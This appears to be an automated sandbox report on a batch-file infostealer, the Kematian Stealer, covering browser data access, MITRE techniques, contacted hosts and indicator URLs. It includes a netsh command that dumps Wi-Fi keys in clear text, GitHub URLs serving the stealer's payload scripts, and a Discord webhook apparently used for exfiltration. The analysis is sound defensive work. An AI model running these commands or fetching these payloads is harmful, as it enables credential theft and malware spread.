      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\minidumps
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionstore-backups
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\crashes
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache
      Uses netsh to dump wireless credentials
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" wlan export profile folder=C:\Users\user~1\AppData\Local\Temp\wifi key=clear
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" wlan export profile folder=C:\Users\user~1\AppData\Local\Temp\wifi key=clearJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\user\AppData\Roaming\Kematian\US-(user-PC)-(2024-07-03)-(UTC-5)\Browser Data\cookies_netscape_Chrome.txtJump to behavior
      Source: Yara matchFile source: 00000019.00000002.2548122352.00000236B1AD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7696, type: MEMORYSTR

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information11
      Scripting      		Valid Accounts831
      Windows Management Instrumentation      		11
      Scripting      		1
      DLL Side-Loading      		1
      Disable or Modify Tools      		2
      OS Credential Dumping      		1
      File and Directory Discovery      		Remote Services1
      Archive Collected Data      		1
      Ingress Tool Transfer      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      Command and Scripting Interpreter      		1
      DLL Side-Loading      		11
      Process Injection      		1
      Obfuscated Files or Information      		1
      Credentials In Files      		34
      System Information Discovery      		Remote Desktop Protocol31
      Data from Local System      		11
      Encrypted Channel      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts1
      PowerShell      		2
      Registry Run Keys / Startup Folder      		2
      Registry Run Keys / Startup Folder      		1
      Software Packing      		Security Account Manager851
      Security Software Discovery      		SMB/Windows Admin Shares1
      Email Collection      		2
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      DLL Side-Loading      		NTDS1
      Process Discovery      		Distributed Component Object ModelInput Capture13
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
      Masquerading      		LSA Secrets351
      Virtualization/Sandbox Evasion      		SSHKeylogging1
      Proxy      		Scheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts351
      Virtualization/Sandbox Evasion      		Cached Domain Credentials1
      Application Window Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
      Process Injection      		DCSync1
      System Network Configuration Discovery      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
      Rundll32      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1467094 Sample: thegreatestexecutor.bat Startdate: 03/07/2024 Architecture: WINDOWS Score: 100 59 raw.githubusercontent.com 2->59 61 ip-api.com 2->61 63 3 other IPs or domains 2->63 85 Malicious sample detected (through community Yara rule) 2->85 87 Yara detected PowerShell ScreenShot 2->87 89 Yara detected Powershell decode and execute 2->89 91 12 other signatures 2->91 11 cmd.exe 7 2->11         started        15 svchost.exe 2->15         started        signatures3 process4 dnsIp5 51 C:\Users\user\AppData\Roaming\...\fr.bat, Unicode 11->51 dropped 93 Drops script or batch files to the startup folder 11->93 95 Bypasses PowerShell execution policy 11->95 18 powershell.exe 23 11->18         started        21 mshta.exe 1 11->21         started        23 net.exe 1 11->23         started        25 9 other processes 11->25 71 127.0.0.1 unknown unknown 15->71 file6 signatures7 process8 signatures9 73 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 18->73 75 Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines) 18->75 77 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 18->77 79 10 other signatures 18->79 27 powershell.exe 14 75 21->27         started        31 net1.exe 1 23->31         started        process10 dnsIp11 65 ip-api.com 208.95.112.1, 49717, 80 TUT-ASUS United States 27->65 67 raw.githubusercontent.com 185.199.109.133, 443, 49711, 49721 FASTLYUS Netherlands 27->67 69 www.cloudflare.com 104.16.123.96, 443, 49715, 49716 CLOUDFLARENETUS United States 27->69 97 Found many strings related to Crypto-Wallets (likely being stolen) 27->97 99 Loading BitLocker PowerShell Module 27->99 101 Uses netsh to dump wireless credentials 27->101 33 powershell.exe 27->33         started        37 powershell.exe 27->37         started        40 conhost.exe 27->40         started        42 2 other processes 27->42 signatures12 process13 dnsIp14 55 objects.githubusercontent.com 185.199.110.133, 443, 49725 FASTLYUS Netherlands 33->55 81 Found Tor onion address 33->81 83 Tries to harvest and steal browser information (history, passwords, etc) 33->83 57 github.com 140.82.121.3, 443, 49720, 49722 GITHUBUS United States 37->57 49 C:\Users\user\AppData\...\bekownh2.cmdline, Unicode 37->49 dropped 44 csc.exe 37->44         started        file15 signatures16 process17 file18 53 C:\Users\user\AppData\Local\...\bekownh2.dll, PE32 44->53 dropped 47 cvtres.exe 44->47         started        process19

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      thegreatestexecutor.bat3%ReversingLabs

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://nuget.org/NuGet.exe0%URL Reputationsafe
      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
      http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
      http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
      https://go.micro0%URL Reputationsafe
      http://ip-api.com/json0%URL Reputationsafe
      https://contoso.com/License0%URL Reputationsafe
      https://contoso.com/Icon0%URL Reputationsafe
      http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
      https://contoso.com/0%URL Reputationsafe
      https://nuget.org/nuget.exe0%URL Reputationsafe
      http://ip-api.com0%URL Reputationsafe
      https://aka.ms/pscore680%URL Reputationsafe
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
      http://ip-api.com/line/?fields=hosting0%URL Reputationsafe
      https://github.com/ChildrenOfYahweh/Kematian-Stealer/raw/main/frontend-src/blockhosts.ps10%Avira URL Cloudsafe
      https://www.cloudflare.com/cdn-cgi/trace0%Avira URL Cloudsafe
      https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps10%Avira URL Cloudsafe
      https://aka.ms/winsvr-2022-pshelp0%Avira URL Cloudsafe
      https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/antivm.ps10%Avira URL Cloudsafe
      https://github.com/somali-devs/kematian-stealer/raw/main/frontend-src/webcam.ps10%Avira URL Cloudsafe
      https://github.com0%Avira URL Cloudsafe
      http://crl.ver)0%Avira URL Cloudsafe
      https://aka.ms/winsvr-2022-pshelpX0%Avira URL Cloudsafe
      https://g.live.com/odclientsettings/ProdV21C:0%Avira URL Cloudsafe
      http://www.microsoft.0%Avira URL Cloudsafe
      https://raw.githubusercontent.com/C$&m0%Avira URL Cloudsafe
      https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnw0%Avira URL Cloudsafe
      https://raw.githubusercontent.com/ChildrenOfYa0%Avira URL Cloudsafe
      https://github.com/Pester/Pester0%Avira URL Cloudsafe
      https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps10%Avira URL Cloudsafe
      https://www.cloudflare.com0%Avira URL Cloudsafe
      https://github.com/Somali-Devs/Kematian-Stealer/releases/download/KematianBuild/kematian.bin0%Avira URL Cloudsafe
      http://go.micros0%Avira URL Cloudsafe
      http://www.microscom/pkiops/certs/MicWinProPCA2011_2011-10-19.crt00%Avira URL Cloudsafe
      http://github.com0%Avira URL Cloudsafe
      https://github.com/TheWover0%Avira URL Cloudsafe
      https://github.com/stefanstranger/PowerShell/blob/master/Get-WebCamp.ps10%Avira URL Cloudsafe
      https://g.live.com/odclientsettings/Prod1C:0%Avira URL Cloudsafe
      https://raw.githubusercontent.com0%Avira URL Cloudsafe
      https://raw.git0%Avira URL Cloudsafe
      https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/main.ps10%Avira URL Cloudsafe
      https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/webcam.ps10%Avira URL Cloudsafe
      http://raw.githubusercontent.com0%Avira URL Cloudsafe
      https://github.com/Somali-Devs/Kematian-Stealer0%Avira URL Cloudsafe
      https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/injection.js0%Avira URL Cloudsafe
      https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/kematian_shellcode.ps10%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      www.cloudflare.com
      		104.16.123.96
      		truefalse
        		unknown
        github.com
        		140.82.121.3
        		truetrue
          		unknown
          raw.githubusercontent.com
          		185.199.109.133
          		truetrue
            		unknown
            ip-api.com
            		208.95.112.1
            		truetrue
              		unknown
              objects.githubusercontent.com
              		185.199.110.133
              		truefalse
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1true
                • Avira URL Cloud: safe
                		unknown
                https://www.cloudflare.com/cdn-cgi/tracefalse
                • Avira URL Cloud: safe
                		unknown
                https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1false
                • Avira URL Cloud: safe
                		unknown
                https://github.com/Somali-Devs/Kematian-Stealer/releases/download/KematianBuild/kematian.binfalse
                • Avira URL Cloud: safe
                		unknown
                https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/webcam.ps1false
                • Avira URL Cloud: safe
                		unknown
                https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/kematian_shellcode.ps1false
                • Avira URL Cloud: safe
                		unknown
                https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1true
                  		unknown
                  http://ip-api.com/line/?fields=hostingfalse
                  • URL Reputation: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://nuget.org/NuGet.exepowershell.exe, 0000000C.00000002.1360562547.0000020A661C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1614835648.000002B3C1317000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1672707734.000002B3CFA90000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1672707734.000002B3CFBD3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000019.00000002.2548122352.00000236B24D9000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.com/ChildrenOfYahweh/Kematian-Stealer/raw/main/frontend-src/blockhosts.ps1powershell.exe, 00000019.00000002.2548122352.00000236B1AD9000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/antivm.ps1powershell.exe, 00000019.00000002.2548122352.00000236B1AD9000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000001F.00000002.1614835648.000002B3BFC51000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000000C.00000002.1337478042.0000020A56378000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2548122352.00000236B1AD9000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000001F.00000002.1614835648.000002B3BFC51000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://github.com/somali-devs/kematian-stealer/raw/main/frontend-src/webcam.ps1powershell.exe, 0000001F.00000002.1614710013.000002B3BE276000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.compowershell.exe, 0000001F.00000002.1614835648.000002B3C1028000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1614835648.000002B3C0D64000.00000004.00000800.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  		unknown
                  https://go.micropowershell.exe, 0000000C.00000002.1337478042.0000020A569FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1337478042.0000020A57780000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1337478042.0000020A570A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1614835648.000002B3C0651000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://ip-api.com/jsonpowershell.exe, 00000019.00000002.2548122352.00000236B1AD9000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://contoso.com/Licensepowershell.exe, 0000001F.00000002.1672707734.000002B3CFBD3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://contoso.com/Iconpowershell.exe, 0000001F.00000002.1672707734.000002B3CFBD3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://aka.ms/winsvr-2022-pshelpXpowershell.exe, 0000000C.00000002.1337478042.0000020A57780000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 0000001B.00000003.1466607958.0000023F504C0000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://crl.ver)svchost.exe, 0000001B.00000002.2541749717.0000023F50600000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.microsoft.powershell.exe, 0000000C.00000002.1366435066.0000020A6E439000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.cloudflare.compowershell.exe, 00000019.00000002.2548122352.00000236B1AD9000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwpowershell.exe, 00000019.00000002.2548122352.00000236B17A1000.00000004.00000800.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  		unknown
                  https://raw.githubusercontent.com/C$&mmshta.exe, 00000018.00000002.1493073987.00000216660D6000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://go.microspowershell.exe, 0000000C.00000002.1337478042.0000020A570A9000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.com/Pester/Pesterpowershell.exe, 0000001F.00000002.1614835648.000002B3BFC51000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://raw.githubusercontent.com/ChildrenOfYamshta.exe, mshta.exe, 00000018.00000002.1493073987.00000216660D6000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.microscom/pkiops/certs/MicWinProPCA2011_2011-10-19.crt0powershell.exe, 0000001F.00000002.1684520069.000002B3D825A000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://github.compowershell.exe, 0000001F.00000002.1614835648.000002B3C102D000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.com/TheWoverpowershell.exe, 00000019.00000002.2548122352.00000236B1AD9000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://g.live.com/odclientsettings/Prod1C:svchost.exe, 0000001B.00000003.1466607958.0000023F50519000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.com/stefanstranger/PowerShell/blob/master/Get-WebCamp.ps1powershell.exe, 0000001F.00000002.1614835648.000002B3C10C4000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/main.ps1powershell.exe, 00000019.00000002.2548122352.00000236B1AD9000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://raw.githubusercontent.compowershell.exe, 0000001F.00000002.1614835648.000002B3C1052000.00000004.00000800.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  		unknown
                  https://raw.gitmshta.exe, 00000018.00000002.1493073987.00000216660D6000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000C.00000002.1337478042.0000020A56378000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2548122352.00000236B1AD9000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://contoso.com/powershell.exe, 0000001F.00000002.1672707734.000002B3CFBD3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://nuget.org/nuget.exepowershell.exe, 0000000C.00000002.1360562547.0000020A661C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1614835648.000002B3C1317000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1672707734.000002B3CFA90000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1672707734.000002B3CFBD3000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://ip-api.compowershell.exe, 00000019.00000002.2548122352.00000236B24D9000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://raw.githubusercontent.compowershell.exe, 0000001F.00000002.1614835648.000002B3C1068000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://aka.ms/pscore68powershell.exe, 0000000C.00000002.1337478042.0000020A56151000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2548122352.00000236B17A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1614835648.000002B3BFA21000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://github.com/Somali-Devs/Kematian-Stealerpowershell.exe, 00000019.00000002.2548122352.00000236B3B6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2548122352.00000236B24D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2548122352.00000236B41EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2548122352.00000236B2ED9000.00000004.00000800.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000C.00000002.1337478042.0000020A56151000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2548122352.00000236B17A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1614835648.000002B3BFA21000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/injection.jspowershell.exe, 00000019.00000002.2548122352.00000236B1AD9000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  208.95.112.1
                  		ip-api.comUnited States
                  		53334TUT-ASUStrue
                  185.199.109.133
                  		raw.githubusercontent.comNetherlands
                  		54113FASTLYUStrue
                  140.82.121.3
                  		github.comUnited States
                  		36459GITHUBUStrue
                  185.199.110.133
                  		objects.githubusercontent.comNetherlands
                  		54113FASTLYUSfalse
                  104.16.123.96
                  		www.cloudflare.comUnited States
                  		13335CLOUDFLARENETUSfalse

                  Private

                  IP
                  127.0.0.1

                  General Information

                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1467094
                  Start date and time:2024-07-03 18:07:08 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 9m 55s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:39
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Sample name:thegreatestexecutor.bat
                  Detection:MAL
                  Classification:mal100.troj.spyw.expl.evad.winBAT@41/53@5/6
                  EGA Information:
                  • Successful, ratio: 33.3%
                  HCA Information:
                  • Successful, ratio: 60%
                  • Number of executed functions: 19
                  • Number of non-executed functions: 6
                  Cookbook Comments:
                  • Found application associated with file extension: .bat

                  Warnings

                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
                  • Excluded IPs from analysis (whitelisted): 184.28.90.27
                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, time.windows.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target powershell.exe, PID 1920 because it is empty
                  • Execution Graph export aborted for target powershell.exe, PID 6660 because it is empty
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtCreateFile calls found.
                  • Report size getting too big, too many NtCreateKey calls found.
                  • Report size getting too big, too many NtNotifyChangeKey calls found.
                  • Report size getting too big, too many NtOpenFile calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                  • Report size getting too big, too many NtSetInformationFile calls found.
                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • VT rate limit hit for: thegreatestexecutor.bat

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  12:08:09API Interceptor2653520x Sleep call for process: powershell.exe modified
                  12:08:25API Interceptor2x Sleep call for process: svchost.exe modified

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  208.95.112.1QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                  • ip-api.com/line/?fields=hosting
                  Cuentas bancarias y cdigo ##Swift incorrecto.xla.xlsxGet hashmaliciousAgentTeslaBrowse
                  • ip-api.com/line/?fields=hosting
                  6bdudXAsQW.exeGet hashmaliciousAgentTeslaBrowse
                  • ip-api.com/line/?fields=hosting
                  H50bdqfVH2.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                  • ip-api.com/line/?fields=hosting
                  kZa81nzREg.exeGet hashmaliciousAgentTeslaBrowse
                  • ip-api.com/line/?fields=hosting
                  bv8iPF7cTY.exeGet hashmaliciousAgentTeslaBrowse
                  • ip-api.com/line/?fields=hosting
                  jsLnybSs43.exeGet hashmaliciousAgentTeslaBrowse
                  • ip-api.com/line/?fields=hosting
                  tgBNtoWqIp.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                  • ip-api.com/line/?fields=hosting
                  fiDe44VTwh.exeGet hashmaliciousAgentTeslaBrowse
                  • ip-api.com/line/?fields=hosting
                  9691e6dc404680cc6648726c8d124a6d4fc637bb6b4a092661308012438623b2_dump.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                  • ip-api.com/line/?fields=hosting
